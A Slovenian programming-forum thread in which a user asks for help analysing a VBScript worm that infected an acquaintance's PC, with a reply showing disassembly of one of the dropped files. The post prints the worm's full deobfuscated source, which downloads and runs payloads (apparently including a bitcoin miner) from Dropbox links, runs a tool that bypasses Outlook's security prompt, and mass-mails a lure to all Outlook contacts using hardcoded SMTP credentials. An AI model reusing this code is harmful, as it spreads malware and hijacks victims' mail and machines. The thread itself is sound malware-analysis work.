Forum » Programiranje » Reverse engineering virusa
Reverse engineering virusa
lsvet1 ::
Danes se je moji znanki dogodila neprijetna stvar, namreč očitno je nekje odprla neko VB Scripto in okužila računalnik z virusom. Bi bilo pa fajn ugotoviti kaj počne in kako jo odstraniti. Stvarca se širi preko maila in facebooku, tako da sm lahko tudi jaz prišel do svojega izvoda. Problem je, da je stvar očitno nova in jo AV-ji še ne zaznajo, je pa kar precej kompleksno zgrajena. Torej, širi se preko obfuscatane VB scripte (random ime npr. oosdfk75.zip; notri je oosdfk75.vbs), koda, kakor mi jo je uspelo deobfuscatat je spodnja
Kakor je videti stvar torej downloada tri stvari iz dropboxa documents.zip, xml.zip in pa clickyes.dat; documents.zip je obfuscated source code virusa, ki se pošilja in širi drugim preko facebooka in emaila (predvidevam, da preko outlook address liste); xml.zip in pa clickyes.dat sta pa kakor mi je uspelo do sedaj ugotoviti executable fajla (.exe) samo z drugo končnico, ni mi pa še uspelo ugotoviti kaj naredita, torej če se komu ljubi in ima čas na hitro reverse engineerat, bi pomoč prišla zelo prav. Prilagam zazipane fajle, saj bodo morda kmalu izbrisani z Dropboxa - PREVIDNO pri odpiranju http://www61.zippyshare.com/v/31759391/...
UPDATE:
Clickyes.exe je zelo verjetno tole http://www.contextmagic.com/express-cli... in omogoči main programu v xml.zip pošiljanje pošte brez prompta...
"Express ClickYes is a tiny program that runs in the system tray and automatically clicks the Yes button for the Outlook security prompt, that asks you to confirm mail sending from third party applications or access to Outlook's address book."
UPDATE2: očitno gre za nek tip(xml.zip) bitcoin minerja...
Hvala za pomoč
On Error Resume Next Randomize Dim tmpDir: tmpDir = "C:\temp" Dim tmpFileName: tmpFileName = getName(int(rnd * 10) + 5) & "." & getName(2) Dim pepeSource Dim selfLink pepeSource = "http://dl.dropboxusercontent.com/s/rxkbtjtpvzgrra4/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8w0ldbbf0ndb78l/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ubdlqx6leqy3gw8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h6znwxvjs3rpvw7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/eclb44x6t01lxsg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ywfb7lux4of25au/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6xm9cw2dkmo0q0k/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xoqbc490nurxeow/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ja2hb47rwkzqqo8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/y8lpltcjxuf81n7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8zaselhbwkdw3w7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xfyakmoo7gzv4j3/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/bxlxjku6u6i5mqq/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/gs3eq8r00yn4of8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6e7xw9qrovheepd/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/073he87wsizsn14/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/z4jl4ckge68ly86/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/2v5auf9b4wh1sas/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/clw9swn6w7ez8yz/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/yc4ju3wap4y71va/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/l93ij60w4jsgj6e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ll2ydaxt1qesxbg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h5fy4kinzcqpo0e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/1dxzjip2h8ep2fl/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/98yoxgz9nh00lxp/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/r7ll4mze3xigpkb/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/da9mznunn0kz588/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/36gldtb1ngjhjg1/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h3bt7tygbf91jsm/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/m26w3f17a8zc3tr/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/vntfj2zc6nygvv2/xml.zip?dl=1" yesSource = "http://dl.dropboxusercontent.com/s/o0d1ce9toe9a9rq/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/f2h777xsqv8cepb/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/ui6zo977ttx7bqy/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/tsv6l172jqlt0tf/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/d9bt6hyvhjjwwkd/clickyes.dat?dl=1" vbsSource = "http://dl.dropboxusercontent.com/s/uw92ooko73yincw/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/j7eiyij7wshwhoe/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/x2npx95tzmk724r/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/i0orsrnizec9fr0/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/liwvrveoh67qbnw/Documents.zip?dl=1" createTmpDir() getPepe pepeSource, tmpDir & "\" & tmpFileName pwnpwn("regsvr32 /s " & tmpDir & "\" & tmpFileName) getPepe yesSource, tmpDir & "\clickyes.exe" pwnpwn(tmpDir & "\clickyes.exe") WScript.Sleep(3000) selfLink = getSelfLink(vbsSource) if selfLink = "" then Else spreadTheWord "kate.lisbon" & Int(rnd * 1990) + 1970 & "@yahoo.de", selfLink, "Documents.zip", "ALL" End If Sub pwnpwn(what) Set oShell = WScript.CreateObject("WSCript.shell") oShell.run what End Sub Sub createTmpDir() Set oFSO = CreateObject("Scripting.FileSystemObject") If Not oFSO.FolderExists(tmpDir) Then Set objFolder = oFSO.CreateFolder(tmpDir) End If End Sub Function getSelfLink(source) source = Split(source, ",") for each link in source Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp") Dim bStrm: Set bStrm = createobject("adodb.stream") xHttp.Open "GET", link, False xHttp.Send If(xHttp.Status = 200) then getSelfLink = link Exit Function End If Next End Function Sub getPepe(source, destination) source = Split(source, ",") for each link in source Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp") Dim bStrm: Set bStrm = createobject("adodb.stream") xHttp.Open "GET", link, False xHttp.Send If(xHttp.Status = 200) then With bStrm .type = 1 .open .write xHttp.responseBody .savetofile destination, 2 End With For a = 0 to int(rnd * 10) + 3 WScript.Sleep(1000) Next Exit Sub End If Next End Sub Function getName(numOfChars) Dim currentString Dim charset charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" For i = 0 to numOfChars currentString = currentString & Mid(charset, int(Len(charset)*rnd+1), 1) Next getName = currentString End Function Sub SendMessage(MailFrom, MailTo, Subject, Message) Dim ObjSendMail Set ObjSendMail = CreateObject("CDO.Message") With ObjSendMail.Configuration.Fields .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr" .Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587 .Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False .Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60 .Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 .Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "nastia26@otenet.gr" .Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#" .Update End With ObjSendMail.To = MailTo ObjSendMail.Subject = Subject ObjSendMail.From = MailFrom ObjSendMail.HTMLBody = Message ObjSendMail.Send Set ObjSendMail = Nothing End Sub Function ElementInArray(aMyArray, strLookingFor, compare) ElementInArray = (UBound(Filter(aMyArray, strLookingFor, True, compare)) > - 1) End Function Sub spreadTheWord(SenderEmail, URL, DOCNAME, mailFilter) Const olFolderContacts = 10 isThere = Array() Set objOutlook = CreateObject("Outlook.Application") Set objNamespace = objOutlook.GetNamespace("MAPI") Set colContacts = objNamespace.GetDefaultFolder(olFolderContacts).Items For Each objContact In colContacts If objContact.Email1Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email1Address, mailFilter) Then If ElementInArray(isThere, objContact.Email1Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email1Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email1Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email1Address End If End If End If If objContact.Email2Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email2Address, mailFilter) Then If ElementInArray(isThere, objContact.Email2Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email2Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email2Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email2Address End If End If End If If objContact.Email3Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email3Address, mailFilter) Then If ElementInArray(isThere, objContact.Email3Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email3Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email3Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email3Address End If End If End If Next Const olFolderInbox = 6 Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox) Set colItems = objFolder.Items For Each objItem in colItems If mailFilter <> "ALL" And InStr(objItem.SenderEmailAddress, mailFilter) Then If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objItem.SenderEmailAddress End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for. " & DOCNAME & " Keep me posted for any complaints or anything. Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objItem.SenderEmailAddress End If End If Next End Sub
Kakor je videti stvar torej downloada tri stvari iz dropboxa documents.zip, xml.zip in pa clickyes.dat; documents.zip je obfuscated source code virusa, ki se pošilja in širi drugim preko facebooka in emaila (predvidevam, da preko outlook address liste); xml.zip in pa clickyes.dat sta pa kakor mi je uspelo do sedaj ugotoviti executable fajla (.exe) samo z drugo končnico, ni mi pa še uspelo ugotoviti kaj naredita, torej če se komu ljubi in ima čas na hitro reverse engineerat, bi pomoč prišla zelo prav. Prilagam zazipane fajle, saj bodo morda kmalu izbrisani z Dropboxa - PREVIDNO pri odpiranju http://www61.zippyshare.com/v/31759391/...
UPDATE:
Clickyes.exe je zelo verjetno tole http://www.contextmagic.com/express-cli... in omogoči main programu v xml.zip pošiljanje pošte brez prompta...
"Express ClickYes is a tiny program that runs in the system tray and automatically clicks the Yes button for the Outlook security prompt, that asks you to confirm mail sending from third party applications or access to Outlook's address book."
UPDATE2: očitno gre za nek tip(xml.zip) bitcoin minerja...
Hvala za pomoč
- spremenil: lsvet1 ()
sas084 ::
Na hitro sm pregledu clickyes.dat in zgleda da gre za Express ClickYes 1.2 (exe ni zapakiran/obfuskiran, nisem pa preverjal hashev z originalom tako da ne morem rečt ali je spremenjen ali ne).
xml.zip pa Symantec zazna kot Suspicious.AD. Bolj podrobno bom pregledu ko bom imel čas.
CODE:00404CD3 push 0 CODE:00404CD5 push offset unk_407738 CODE:00404CDA push 0 CODE:00404CDC push 30h CODE:00404CDE call SystemParametersInfoA CODE:00404CE3 push 0C80000h CODE:00404CE8 mov eax, ds:dword_407740 CODE:00404CED sub eax, 0EDh CODE:00404CF2 push eax CODE:00404CF3 mov eax, ds:dword_407744 CODE:00404CF8 sub eax, 78h CODE:00404CFB push eax CODE:00404CFC push 0EBh CODE:00404D01 push 76h CODE:00404D03 push 0 CODE:00404D05 push 0 CODE:00404D07 mov eax, ds:hModule CODE:00404D0C push eax CODE:00404D0D push 0 CODE:00404D0F mov ecx, offset aExpressClick_0 ; "Express ClickYes 1.2" CODE:00404D14 mov edx, offset aExclickyes_wnd ; "EXCLICKYES_WND" CODE:00404D19 mov eax, 100h CODE:00404D1E call sub_403D48 CODE:00404D23 mov ds:hWnd, eax CODE:00404D28 push 5Ah CODE:00404D2A push 3Eh CODE:00404D2C push 3Ch CODE:00404D2E push 14h CODE:00404D30 mov eax, ds:hWnd CODE:00404D35 push eax CODE:00404D36 push 0 CODE:00404D38 mov eax, ds:hModule CODE:00404D3D push eax CODE:00404D3E push 0 CODE:00404D40 mov edx, offset aOk ; "OK" CODE:00404D45 mov eax, offset aButton_0 ; "Button" CODE:00404D4A mov ecx, 50001000h CODE:00404D4F call sub_403DA0
xml.zip pa Symantec zazna kot Suspicious.AD. Bolj podrobno bom pregledu ko bom imel čas.
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | Seznam slovenskih besedOddelek: Programiranje | 7360 (4850) | bubadiop |
» | Foto - Aprilska norostOddelek: Zvok in slika | 4287 (1913) | Super Sonic |
» | UserControl v Wrappanelu WPFOddelek: Programiranje | 1145 (967) | hurlimannxt |
» | Visual BasicOddelek: Programiranje | 3443 (2469) | cekr |
» | dropbox vprašanje ?Oddelek: Omrežja in internet | 7078 (5348) | fulgur |